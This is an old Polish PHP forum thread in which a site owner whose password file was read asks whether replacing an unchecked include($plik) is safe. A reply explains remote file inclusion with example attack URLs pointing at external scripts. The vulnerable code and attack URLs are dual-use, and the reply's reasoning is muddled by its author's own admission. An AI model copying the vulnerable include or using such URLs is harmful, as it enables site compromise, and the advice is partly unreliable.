![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 24 Pomógł: 0 Dołączył: 14.10.2003 Ostrzeżenie: (0%) ![]() ![]() |
Ostatnio dużo czytałem o zabezpieczeniech danych przesyłanych drogą post i get
Nawet w prowadzonym przez mnie serwisie stosując stare techniki ktoś odczytał plik d.php gdzie przechowywane sa hasła i zaproponował mi zmainą poniższego kodu na następujący [php:1:38b804c758]<?php if ((!isset($plik)) || ($plik=="")) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] na następujący [php:1:38b804c758]<?php $plik = $HTTP_GET_VARS['plik']; if ($plik||!file_exists($plik)) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] Czy to jest poprawne i nie ma zadnego haka i jak bylo to mozliew ze sprawdzili moje hasła ___ [scanner] Zmoderowane. Prosze używac BBCode |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 61 Pomógł: 0 Dołączył: 16.08.2003 Skąd: Wrocław Ostrzeżenie: (0%) ![]() ![]() |
Cytat IMHO ten drugi zapis jest bezpieczny.
Natomiast w pierwszym jest include, który nie sprawdza gdzie dany skrypt się znajduje, przez co można otworzyć skrypty z innych serwerów np: http://twoja.strona.pl/?plik=http://forum....hp.pl/index.php Oczywiście zamiast index.php można dać inny skrypt, który może zrobić to co chce jego autor. Nie jestem pewien czy to o to chodzi, ale chyba powyzszy post to dobrze wyjasnia (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Tak wiec hasla wydobyl wpisujac: http://twoja.strona.pl/?cel=http://jegostr...rzanyskrypt.php Tak wiec teoretycznie php wysyla juz przerobiony kod... z tym ze wykonuje z podana sciezka... dlatego np. gdy mamy 2 pliki: katalog/wyswietl.php [php:1:7062864d12]<?php include("mama.php"); ?>[/php:1:7062864d12] (plik mama.php tez jest w katalogu "katalog/") i uruchomimy plik: index.php (bedacy w glownym katalogu) zawierajacy: [php:1:7062864d12]<?php include("katalog/wyswietl.php"); ?>[/php:1:7062864d12] to zamiast po wejsciu na plik index.php wyswietlic mama.php wyswietli nam blad... (zastanowcie sie chwilke to zrozumiecie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ) Moze to troche topornie wytlumaczone, ale po prostu w ten sposob gdy zaincludujemy plik spoza naszego serwera to umozliwiamy skryptowi z tamtego serwera dostanie sie do naszych zmiennych (zreszta sam juz nie wiem, sam sobie wszystko pomieszalem (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) zalezy od budowy twego skryptu... jest to luka w bezpieczenstwie i tyle) |
|
|
![]() ![]() |
![]() |
Aktualny czas: 8.10.2025 - 16:12 |